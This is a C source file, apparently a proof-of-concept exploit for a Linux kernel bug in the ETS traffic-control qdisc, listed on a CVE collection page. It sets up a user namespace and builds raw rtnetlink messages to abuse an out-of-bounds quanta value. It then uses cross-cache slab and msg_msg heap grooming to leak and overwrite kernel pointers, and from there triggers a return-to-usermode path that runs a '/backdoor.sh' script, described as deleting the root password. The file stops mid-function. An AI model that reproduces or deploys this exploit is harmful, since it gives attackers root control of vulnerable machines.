4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exp_2.c C
#include <stdarg.h>
#include <time.h>
#define __USE_GNU 1
#define _GNU_SOURCE
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <fcntl.h>
#include <linux/kernel.h>
#include <linux/netlink.h>
#include <linux/sock_diag.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>
#include <sched.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <stdbool.h>
#include <errno.h>
#include <net/if.h>
#include <pthread.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/if_alg.h>

void set_quant(uint32_t quant, int sock_fd, int idx,
               struct sockaddr_nl *dest_addr);
uint32_t get_quant(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int clid, int handle, int parent);
uint32_t dump_qdisc(uint64_t *kbase, uint64_t *k2kleak);
void do_ptr_write(uint32_t idx, uint32_t dst, int do_reset, int sock_to_use,
                  struct sockaddr_nl *dst_addr);
uint32_t del_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int hnd);
int create_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr, int hnd,
                 int parent_hnd);

// for 2k
#define PARTIAL_LIST_SZ 24
#define OBJ_PER_SLAB 16
#define TOTAL_ALLOC (OBJ_PER_SLAB * (PARTIAL_LIST_SZ + 1))
#define SOCK_SZ 0x4d0
#define PRE (OBJ_PER_SLAB - 1)
#define POST (OBJ_PER_SLAB + 1)
#define GARBAGE (TOTAL_ALLOC)
#define FLUSH 0x12c

#define NLA_F_NESTED (1 << 15)

#define SOCK_SPRAY ((OBJ_PER_SLAB * PARTIAL_LIST_SZ) * 2)
#define QID1_NUM (EVICT_N + PRE + POST + 1)
#define EVICT_N (OBJ_PER_SLAB * 0x400)
#define MSGSZ 48
#define MSG_COPY 040000
#define PAGESIZE 0x1000
#define MSGMSGSZ PAGESIZE - 48
#define MSGSEGSZ PAGESIZE - 8
//  This is ruia's fault
#define MSG_SPRAY 9999

#define MAX_K2K_SZ 0x800
#define COMP_SZ_MAX (MSGMSGSZ)
#define NEWCOMPSZ (COMP_SZ_MAX + 0x100)

#define MAX_PAYLOAD 1024   /* maximum payload size*/
#define NLM_F_REQUEST 0x01 /* It is request message. 	*/
#define NLM_F_CREATE 0x400 /* Create, if it does not exist	*/
#define NLMSG_MIN_TYPE 0x10
#define TC_H_MAJ_MASK (0xFFFF0000U)

/* Header placed in front of each continuation segment of a message. */
struct msg_msgseg {
  /* Link to the following segment; this segment's data starts right after
   * this header in memory. */
  struct msg_msgseg *next;
};

/* Header placed in front of the first part of a message; the message text
 * itself follows immediately after the last member. */
struct msg_msg {
  void *lnext;             /* list linkage: next */
  void *lprev;             /* list linkage: previous */
  long m_type;             /* message type */
  size_t m_ts;             /* message text size */
  struct msg_msgseg *next; /* first continuation segment, if any */
  void *security;
};

/*
 * Receive one message from System V queue `qid` into a heap buffer.
 *
 * qid      - message queue identifier.
 * msgsz    - maximum number of text bytes to receive (longer messages are
 *            truncated because MSG_NOERROR is always set).
 * copy_msg - non-zero to add MSG_COPY to the receive flags.
 * type     - passed to msgrcv() as msgtyp.
 *
 * Returns a malloc'd buffer the caller must free(). The buffer holds what
 * msgrcv() stores: the long mtype first, then the message text.
 * Never blocks (IPC_NOWAIT); any failure prints a diagnostic and exits.
 */
char *recv_msg(int qid, int msgsz, int copy_msg, int type) {
  // msgrcv() writes the long mtype in front of the text, so the buffer has to
  // be larger than msgsz; the extra 0x10 bytes cover that header.
  char *memdmp = malloc((size_t)msgsz + 0x10);
  if (memdmp == NULL) {
    perror("recv_msg malloc");
    exit(-1);
  }

  int flags = IPC_NOWAIT | MSG_NOERROR;
  if (copy_msg)
    flags |= MSG_COPY;

  if (msgrcv(qid, memdmp, msgsz, type, flags) < 0) {
    perror("msgrcv lol");
    free(memdmp);
    exit(-1);
  }

  return memdmp;
}

// Explicitly-named variant of recv_msg() that always requests a copying
// receive, whatever the caller passes in copy_msg.
char *recv_msg_CPY(int qid, int msgsz, int copy_msg, int type) {
  (void)copy_msg; // kept for signature parity; the copy flag is forced on
  char *peeked = recv_msg(qid, msgsz, 1, type);
  return peeked;
}
/*
 * Hex-dump `len` bytes starting at `data` to stdout.
 *
 * Each byte is printed as two lowercase hex digits followed by `sep`.
 * A line break is emitted after every 16 bytes, and the output always ends
 * with a newline (an empty dump prints a single newline).
 */
void dumph(unsigned char *data, uint32_t len, char sep) {
  for (uint32_t i = 0; i < len; i++) {
    printf("%02x%c", data[i], sep);

    // Break after the 16th byte of each row, not after the first byte.
    if (i % 16 == 15)
      printf("\n");
  }

  // Terminate a partially filled (or empty) last row.
  if (len == 0 || len % 16 != 0)
    printf("\n");
}

// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-5345_lts_mitigation/exploit/lts-6.1.52/exploit.c
/*
 * Format a string printf-style and write it to an already existing file.
 *
 * path     - file to open with O_WRONLY (it is not created if missing).
 * data_fmt - printf-style format string, followed by its arguments.
 *
 * The formatted text is handed to write() in a single call; a failed or
 * short write is reported as an error rather than retried.
 *
 * Returns true only if the whole string was written and the file closed
 * cleanly; on any failure a diagnostic goes to stderr and false is returned.
 */
bool write_to_file(const char *path, const char *data_fmt, ...) {
  va_list args;
  va_list measure;

  va_start(args, data_fmt);
  va_copy(measure, args);
  // First pass only measures the formatted length.
  int len = vsnprintf(NULL, 0, data_fmt, measure);
  va_end(measure);
  if (len < 0) {
    perror("vsnprintf");
    va_end(args);
    return false;
  }

  char *buf = malloc((size_t)len + 1);
  if (buf == NULL) {
    perror("malloc");
    va_end(args);
    return false;
  }
  vsnprintf(buf, (size_t)len + 1, data_fmt, args);
  va_end(args);

  int fd = open(path, O_WRONLY);
  if (fd < 0) {
    fprintf(stderr, "open %s for writing: %s\n", path, strerror(errno));
    free(buf);
    return false;
  }

  bool ok = true;
  ssize_t written = write(fd, buf, (size_t)len);
  if (written < 0) {
    fprintf(stderr, "write %s: %s\n", path, strerror(errno));
    ok = false;
  } else if (written != (ssize_t)len) {
    fprintf(stderr, "write %s: short write (%zd of %d bytes)\n", path, written,
            len);
    ok = false;
  }

  if (close(fd) < 0 && ok) {
    fprintf(stderr, "close %s: %s\n", path, strerror(errno));
    ok = false;
  }

  free(buf);
  return ok;
}
/*
 * Move the calling process into new user, mount and network namespaces and
 * map the caller's original uid and gid to id 0 inside the new user
 * namespace.
 *
 * Returns true on success. Returns false as soon as unshare() or any of the
 * /proc/self writes fails; the failing step prints its own diagnostic.
 */
bool setup_namespace(void) {
  // Capture the ids before unshare(); they are the outer side of the mapping.
  unsigned int real_uid = (unsigned int)getuid();
  unsigned int real_gid = (unsigned int)getgid();

  if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET) < 0) {
    perror("unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET)");
    return false;
  }

  // setgroups is written before gid_map, in the same order as before.
  if (!write_to_file("/proc/self/setgroups", "deny"))
    return false;

  if (!write_to_file("/proc/self/uid_map", "0 %u 1\n", real_uid))
    return false;

  if (!write_to_file("/proc/self/gid_map", "0 %u 1\n", real_gid))
    return false;

  return true;
}

// Back to my stuff - old code that aint needed.
// int make_net_ns() {
//  int ns_fd = 0;
//
//  if (unshare(CLONE_NEWNET) < 0) {
//    perror("unshare");
//    exit(-1);
//  }
//  return ns_fd;
//}

/*
 * Send one message to each of the first `spray_n` queues in `qstore`.
 *
 * msgsz   - total size budget; MSGSZ is subtracted from it to get the number
 *           of text bytes actually sent. Must be at least MSGSZ.
 * msgtxt  - source of the message text; at least msgsz - MSGSZ bytes are read.
 * spray_n - number of queues to send to.
 * qstore  - array of at least spray_n queue identifiers.
 *
 * Message i is sent with mtype i + 1. The sends are blocking (flags 0).
 * Returns 0 once every message has been sent; exits the process if msgsz is
 * too small or if any msgsnd() fails.
 */
int msg_spray_nodiag(int msgsz, char *msgtxt, int spray_n, int *qstore) {
  if (msgsz < MSGSZ) {
    fprintf(stderr, "msg_spray_nodiag: msgsz %d is smaller than MSGSZ\n",
            msgsz);
    exit(-1);
  }

  // The buffer keeps the full msgsz, which leaves room for the long mtype in
  // front of the (msgsz - MSGSZ) text bytes.
  char mbuf[msgsz];
  struct msgbuf *msg = (struct msgbuf *)mbuf;
  const int textsz = msgsz - MSGSZ;
  memcpy(msg->mtext, msgtxt, textsz);

  for (int i = 0; i < spray_n; i++) {
    msg->mtype = i + 1;
    if (msgsnd(qstore[i], msg, textsz, 0) < 0) {
      perror("msgsnd lol");
      exit(-1);
    }
  }
  return 0;
}

/*
 * Send a single message to System V queue `qid` without blocking.
 *
 * qid    - message queue identifier.
 * msgsz  - total size budget; MSGSZ is subtracted from it to get the number
 *          of text bytes actually sent. Must be at least MSGSZ.
 * msgtxt - source of the message text; at least msgsz - MSGSZ bytes are read.
 * type   - stored as the message's mtype (msgsnd() requires it to be > 0).
 *
 * Returns 0 on success. Exits the process if msgsz is too small, if the
 * staging buffer cannot be allocated, or if msgsnd() fails (including a full
 * queue, since IPC_NOWAIT is set).
 */
int send_msg(int qid, int msgsz, char *msgtxt, int type) {
  if (msgsz < MSGSZ) {
    fprintf(stderr, "send_msg: msgsz %d is smaller than MSGSZ\n", msgsz);
    exit(-1);
  }

  // Allocating the full msgsz leaves room for the long mtype in front of the
  // (msgsz - MSGSZ) text bytes.
  struct msgbuf *msg = malloc((size_t)msgsz);
  if (msg == NULL) {
    perror("send_msg malloc");
    exit(-1);
  }

  const int textsz = msgsz - MSGSZ;
  msg->mtype = type;
  memcpy(msg->mtext, msgtxt, textsz);

  if (msgsnd(qid, msg, textsz, IPC_NOWAIT) < 0) {
    perror("msgsnd lol");
    free(msg);
    exit(-1);
  }

  free(msg);
  return 0;
}

// Borrowed from hoefler's sploit.
// Restricts the caller to a single CPU so that later allocations and frees
// all happen on that CPU and see the same per-cpu page freelist.
// Background: https://haehyun.github.io/papers/playing-for-keaps-22-sec.pdf.
//
// cpu - index of the only CPU the caller may run on afterwards.
// Exits with status 1 if the affinity cannot be applied.
void pin_cpu(int cpu) {
  cpu_set_t mask;

  CPU_ZERO(&mask);
  CPU_SET(cpu, &mask);

  // A pid of 0 applies the mask to the caller itself.
  const int rc = sched_setaffinity(0, sizeof(mask), &mask);
  if (rc != -1)
    return;

  perror("sched_setaffinity");
  exit(1);
}

// Old func used for pausing and stuff.
// Prints `prompt`, then consumes stdin until an 'X' has been read. Also
// returns when stdin reaches end-of-file or errors out, instead of spinning
// forever on a stream that can never deliver the 'X'.
void waitp(char *prompt) {
  puts(prompt);
  for (;;) {
    int c = getchar();
    if (c == 'X' || c == EOF)
      break;
  }
}

// Open and bind a NETLINK_ROUTE socket and fill in both address structs.
//
// src_addr  - out: zeroed, then set to AF_NETLINK with nl_pid = getpid();
//             this is the address the socket is bound to.
// dest_addr - out: zeroed, then set to AF_NETLINK with nl_pid 0 (the kernel)
//             and nl_groups 0 (unicast).
//
// Returns the socket fd, or -1 if the socket could not be created (in which
// case neither struct is touched). A bind failure terminates the process.
int setup_rtnet(struct sockaddr_nl *src_addr, struct sockaddr_nl *dest_addr) {
  const int nl_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  if (nl_fd < 0)
    return -1;

  /* Peer side: the kernel, unicast. */
  memset(dest_addr, 0, sizeof(*dest_addr));
  dest_addr->nl_groups = 0;
  dest_addr->nl_pid = 0;
  dest_addr->nl_family = AF_NETLINK;

  /* Local side: identified by our own pid. */
  memset(src_addr, 0, sizeof(*src_addr));
  src_addr->nl_pid = getpid();
  src_addr->nl_family = AF_NETLINK;

  const int rc = bind(nl_fd, (struct sockaddr *)src_addr, sizeof(*src_addr));
  if (rc < 0) {
    perror("setup_rtnet bind");
    exit(-1);
  }

  return nl_fd;
}

// Idk why this is in its own function, but it gonna stay this way now.
int do_cross_cache_qdisc(uint32_t *quant, int idx) {

  // How do we ensure that we have several "clean" cache boundaries?
  // ANS: We need some "fluff" objects which guarantee that our socket lands in
  // a slab we have complete control over. We have pre allocations to pad it
  // into the slab, and post allocations which ensure we control the rest of the
  // slab.
  int sockets[TOTAL_ALLOC] = {0};
  uint64_t top = 0xffff8880;
  top <<= 32;
  int junk[TOTAL_ALLOC] = {0};
  int socks_alloc_new_slab[OBJ_PER_SLAB + 1] = {0};
  int socks_victim_slab[OBJ_PER_SLAB] = {0};
  struct sockaddr_nl src_addr, dest_addr;
  struct sockaddr_nl src_addr1, dest_addr1;
  int ret = 0;

  // Alloc and subsequently release our qdisc
  // const char *cmd = "tc qdisc add dev lo root handle 1: ets bands 8 "
  //                  "priomap 7 6 5 4 3 2 1 0; ip link set dev lo up";

  int sock_fd = setup_rtnet(&src_addr, &dest_addr);
  //  This pre-allocation will be enough to get a new slab which we entirely
  //  control
  //
  //  Im using PF_NETLINK as its allocated in normal kmalloc-2k, whereas others
  //  are not. Just the first kind i found that was.
  for (int i = 0; i < TOTAL_ALLOC; i++) {
    junk[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  struct sockaddr_vm addr = {0};

  // Step 1: Alloc target object with pre and post allocations

  int pre_post[PRE + POST] = {0};

  for (int i = 0; i < PRE; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  //  Allocate our qdisc here
  create_qdisc(sock_fd, idx, &dest_addr, 1, TC_H_ROOT);
  system("ip link set dev lo up");
  sleep(1);
  // We need to leak stuff here
  *quant = get_quant(sock_fd, idx, &dest_addr, 0, 0, TC_H_ROOT);
  printf("0x%lx\n", top | (*quant - 0x180));

  //   As well as padding out the rest of the allocation, this also serves the
  //   purpose of setting a new active slab.
  for (int i = PRE; i < PRE + POST; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  //  The qdisc free takes a lil bit from what ive observed
  del_qdisc(sock_fd, idx, &dest_addr, 1);
  sleep(10);
  // sleep(6);
  puts("get new slab");

  // Free other sockets in victime slab
  // Adds our slab to partial list. This is the last time out object gets freed.
  puts("deplete victim slab");

  // Free one obj per slab to overflow partial list
  for (int i = 0; i < TOTAL_ALLOC; i += OBJ_PER_SLAB) {
    close(junk[i]);
  }

  for (int i = 0; i < PRE + POST; i++) {
    close(pre_post[i]);
  }

  // wait("ovf partial list");
  for (int i = 0; i < TOTAL_ALLOC; i++) {
    close(junk[i]);
  }
  //  At this point we shouldve freed the page. Indeed, this works INSIDE QEMU.
  //  Most of the time - i believe - we will need padding to have a chance of
  //  this actually working tho. Now we can spray the target object and reclaim
  //  the page. A socket is about 0x4c0
  //
  close(sock_fd);
  // This sleep improves reliability massively
  sleep(3);
  return 0;
}

// Use the oob access to SET the quant value, OR in our case the prev ptr of the
// active list on the sch.
void set_quant(uint32_t quant, int sock_fd, int idx,
               struct sockaddr_nl *dest_addr) {
  struct nlmsghdr *nlh = NULL;
  struct iovec iov;
  struct msghdr msg;
  memset(&msg, 0, sizeof(msg));
  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ECHO;
  struct tcmsg tc;
  memset(&tc, 0, sizeof(tc));
  char buf[0x1000] = {0};
  struct nlattr *attr = (struct nlattr *)buf;
  memset(attr, 0, sizeof(*attr));
  attr->nla_type = TCA_OPTIONS | NLA_F_NESTED;
  attr->nla_len = NLA_HDRLEN * 3;
  uint32_t clid = 0x0;
  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  tc.tcm_handle = (0x1 << 16) | clid;
  tc.tcm_parent = TC_H_ROOT;
  tc.tcm_ifindex = idx;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));
  // Copy in our attrs
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)), attr, sizeof(*attr));
  attr->nla_type = TCA_ETS_QUANTA_BAND;
  attr->nla_len = NLA_HDRLEN * 2;
  memcpy(&buf[sizeof(*attr)], &quant, sizeof(quant));
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)) + sizeof(*attr), attr,
         sizeof(*attr) + sizeof(uint32_t));

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("set_quant sendmsg");
    exit(-1);
  }
  free(nlh);
}

uint32_t get_quant(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int clid, int handle, int parent) {
  int quant = 0x41414141;
  struct nlmsghdr *nlh = NULL;
  struct iovec iov = {0};
  struct msghdr msg = {0};

  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ECHO;
  struct tcmsg tc;
  memset(&tc, 0, sizeof(tc));
  char buf[0x1000] = {0};
  struct nlattr *attr = (struct nlattr *)buf;
  memset(attr, 0, sizeof(*attr));
  attr->nla_type = TCA_OPTIONS | NLA_F_NESTED;
  // Truncated so we can avoid setting quant value for the class
  attr->nla_len = NLA_HDRLEN * 1;
  if (!clid)
    clid = 0x41;
  if (!handle)
    handle = 1;
  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  tc.tcm_handle = (handle << 16) | clid;
  tc.tcm_parent = parent;
  tc.tcm_ifindex = idx;
  // g_parent = TC_H_ROOT;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));
  // Copy in our attrs
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)), attr, sizeof(*attr));
  attr->nla_type = TCA_ETS_UNSPEC;
  attr->nla_len = NLA_HDRLEN * 1;
  memcpy(&buf[sizeof(*attr)], &quant, sizeof(quant));
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)) + sizeof(*attr), attr,
         sizeof(*attr) + sizeof(uint32_t));

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("get_quant recvmsg");
    exit(-1);
  }

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);

  if (recvmsg(sock_fd, &msg, 0) < 0) {
    perror("get_quant recvmsg");
    exit(-1);
  }
  printf("Received message payload: %s\n", NLMSG_DATA(nlh));

  int qval = *(int *)(&((char *)msg.msg_iov->iov_base)[48 + 4]);

  printf("Quant: 0x%x\n", qval);

  dumph(&((char *)msg.msg_iov->iov_base)[0], 0x60, ' ');

  free(nlh);
  return qval;
}

uint32_t del_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int hnd) {
  struct nlmsghdr *nlh = NULL;
  struct iovec iov = {0};
  struct msghdr msg = {0};
  char buf[1024] = {0};

  struct sockaddr_nl dest_addr_loc = {0};
  struct sockaddr_nl src_addr_loc = {0};

  int oursock = 0;
  if (!sock_fd) {
    oursock = 1;
    // this doesnt work u need to set up rtnetlink
    dest_addr = &dest_addr_loc;
    sock_fd = setup_rtnet(&src_addr_loc, dest_addr);
  }

  struct tcmsg tc = {0};
  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_LENGTH(sizeof(tc));
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_DELQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 1;
  memset(&tc, 0, sizeof(tc));

  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  tc.tcm_handle = (hnd << 16) | 0;
  tc.tcm_parent = TC_H_ROOT;
  tc.tcm_ifindex = idx;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("sendmsg");
    exit(-1);
  }
  printf("Waiting for message from kernel\n");

  iov.iov_base = buf;
  iov.iov_len = sizeof(buf);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);

  if (recvmsg(sock_fd, &msg, 0) < 0) {
    perror("recvmsg");
    exit(-1);
  }
  printf("Received message payload: %s\n", NLMSG_DATA(nlh));

  dumph(&((char *)msg.msg_iov->iov_base)[0], 0x10, ' ');

  if (oursock)
    close(sock_fd);

  free(nlh);
  // Gotta remember that we do reset the handle val
  return 0;
}
int create_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr, int hnd,
                 int parent_hnd) {
  struct nlmsghdr *nlh = NULL;
  struct iovec iov;
  struct msghdr msg;
  uint16_t totlen = 0;

  memset(&msg, 0, sizeof(msg));
  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
  // nlh->nlmsg_len = sizeof(struct nlmsghdr) - 1;
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_NEWQDISC;
  // Somehow removing NLM_F_ECHO fixes leaks somewhat.
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | NLM_F_ECHO;
  struct tcmsg tc;
  memset(&tc, 0, sizeof(tc));
  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  uint32_t clid = 0x0;
  tc.tcm_family = TCA_UNSPEC;
  tc.tcm_handle = (hnd << 16) | clid;
  tc.tcm_parent = parent_hnd;
  tc.tcm_ifindex = idx;
  // g_parent = TC_H_ROOT;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));

  char buf[0x300] = {0};
  struct nlattr *attr = (struct nlattr *)buf;
  attr->nla_type = TCA_KIND;
  attr->nla_len = NLA_HDRLEN + 3;
  strcpy(&attr[1], "ets");
  attr = (struct nlattr *)((uint8_t *)(attr) + NLA_ALIGN(attr->nla_len));
  attr->nla_type = TCA_OPTIONS | NLA_F_NESTED;
  // Will be filled in later
  attr->nla_len = -1;
  struct nlattr *options = attr;
  attr = &attr[1];

  // Copy in our attrs
  attr->nla_type = TCA_ETS_NBANDS;
  attr->nla_len = NLA_HDRLEN + 1;
  *(uint8_t *)(&attr[1]) = 8;
  totlen += NLA_ALIGN(sizeof(*attr) + attr->nla_len);
  attr = (struct nlattr *)((uint8_t *)(attr) + NLA_ALIGN(attr->nla_len));

  attr->nla_type = TCA_ETS_PRIOMAP | NLA_F_NESTED;
  attr->nla_len = NLA_HDRLEN;
  struct nlattr *priomap = attr;
  attr = &attr[1];

  int start_band = 7;
  while (start_band >= 0) {
    attr->nla_type = TCA_ETS_PRIOMAP_BAND;
    attr->nla_len = NLA_HDRLEN + 1;
    *(uint8_t *)(&attr[1]) = start_band;
    priomap->nla_len += NLA_ALIGN(attr->nla_len);
    attr = (struct nlattr *)((uint8_t *)(attr) + NLA_ALIGN(attr->nla_len));
    start_band--;
  }
  totlen += NLA_ALIGN(priomap->nla_len);
  options->nla_len = NLA_ALIGN(totlen);
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)), buf, sizeof(buf));
  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("create_qdisc sendmsg");
    exit(-1);
  }
  free(nlh);

  return 0;
}

// https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/kpti_with_trampoline.c
unsigned long user_cs, user_ss, user_rflags, user_sp;

void save_state() {
  __asm__(".intel_syntax noprefix;"
          "mov user_cs, cs;"
          "mov user_ss, ss;"
          "mov user_sp, rsp;"
          "pushf;"
          "pop user_rflags;"
          ".att_syntax;");
  puts("[*] Saved state");
}

void retfunc() {
  puts("Back in usermode yayyy");

  // https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch
  struct sockaddr_alg sa;
  int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
  if (alg_fd < 0) {
    perror("socket(AF_ALG) failed");
    exit(-1);
  }

  memset(&sa, 0, sizeof(sa));
  sa.salg_family = AF_ALG;
  // Thx theorio
  strcpy((char *)sa.salg_type, "V4bel"); // dummy string
  bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));

  // Should've deleted the root password atp so we gud
  system("/backdoor.sh");
  exit(0);
}
// Just send a packet to localhost
void trigger_write() {
  int s = socket(AF_INET, SOCK_DGRAM, 0);
  struct sockaddr_in saddr = {0};
  saddr.sin_family = AF_INET;
  saddr.sin_port = 1234;
  inet_pton(AF_INET, "127.0.0.1", &saddr.sin_addr);
  sendto(s, "lol", 3, 0, &saddr, sizeof(saddr));
  close(s);
}

// Write the ptr somewhere in slabs
int sock_to_use = 0;
struct sockaddr_nl *dst_addr_glb = NULL;
void do_ptr_write(uint32_t idx, uint32_t dst, int do_reset, int sock_to_use,
                  struct sockaddr_nl *dst_addr) {
  int ret;
  struct sockaddr_nl sdst = {0};
  struct sockaddr_nl src_addr, *dest_addr = &sdst;
  int sock_fd = 0;
  if (!sock_to_use) {
    sock_fd = setup_rtnet(&src_addr, dest_addr);
    if (sock_fd < 0) {
      perror("ptr write setup_rtnet");
      exit(-1);
    }
  } else {
    sock_fd = sock_to_use;
    dest_addr = dst_addr_glb;
  }

  set_quant(dst, sock_fd, idx, dest_addr);

  if (!sock_to_use)
    close(sock_fd);
  sock_to_use = 0;
  dst_addr_glb = NULL;

  trigger_write();

  if (do_reset) {
    ret = system("ip link set dev lo down");
    ret = system("ip link set dev lo up");
  }
}

void make_slabs(int *msgq, int *pre_post, uint32_t num_alloc, uint32_t pre,
                uint32_t post) {
  // Make a bunch of 2k slabs for us to release later, hopefully will enable us
  // to release our qdisc slab from the percpu freelist Because the target is
  // also order-3, we must also release order 3. We should ideally call this
  // func BEFORE anything else in the program.

  // msg_spray_nodiag(int msgsz, char *msgtxt, int spray_n, int *qstore)
  char mtext[MAX_K2K_SZ];
  memset(mtext, 0x88, MAX_K2K_SZ);
  msg_spray_nodiag(MAX_K2K_SZ, mtext, PRE, pre_post);

  msg_spray_nodiag(MAX_K2K_SZ, mtext, num_alloc, msgq);
  msg_spray_nodiag(MAX_K2K_SZ, mtext, POST, &pre_post[PRE]);
}
void release_slabs(int *msgq, int *pre_post, uint32_t num_alloc, uint32_t pre,
                   uint32_t post) {
  // Does the inverse of the above.
  // Free one obj per slab to overflow partial list
  char *mrecv = NULL;
  for (int i = 0; i < num_alloc; i += OBJ_PER_SLAB) {
    mrecv = recv_msg(msgq[i], MAX_K2K_SZ, 0, 0);
    free(mrecv);
  }

  for (int i = 0; i < pre + post; i++) {
    mrecv = recv_msg(pre_post[i], MAX_K2K_SZ, 0, 0);
    free(mrecv);
  }

  for (int i = 0; i < num_alloc; i++) {
    if (!(i % OBJ_PER_SLAB))
      continue;
    mrecv = recv_msg(msgq[i], MAX_K2K_SZ, 0, 0);
    free(mrecv);
  }
}

void do_exp() {
  pin_cpu(0);

  // Make the 2k slabs we will use later to evict
  int evict_slabs[EVICT_N] = {0};
  int *evict_slabs_p = NULL;
  int ev_pre_post[PRE + POST] = {0};
  int *ev_pre_post_ptr = NULL;

  int qid[MSG_SPRAY] = {};
  for (int i = 0; i < MSG_SPRAY; i++) {
    qid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    if (qid[i] < 0) {
      perror("msgget init");
      exit(-1);
    }
  }
  // Need to make sure this is more than MSG_SPRAY*2 lol.
  int qid1[MSG_SPRAY * 2] = {};
  for (int i = 0; i < MSG_SPRAY * 2; i++) {
    qid1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    // qid[i] = msgget(i, IPC_CREAT | 0666);
    if (qid1[i] < 0) {
      perror("msgget init");
      exit(-1);
    }
  }
  evict_slabs_p = qid1;
  ev_pre_post_ptr = &evict_slabs_p[EVICT_N];
